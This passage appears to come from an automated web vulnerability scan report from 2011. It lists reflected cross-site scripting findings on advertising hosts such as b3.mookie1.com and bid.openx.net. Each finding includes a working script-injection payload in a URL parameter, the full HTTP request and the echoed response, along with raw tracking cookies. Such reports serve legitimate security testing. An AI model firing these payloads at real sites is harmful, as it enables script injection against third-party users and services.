Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.107. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
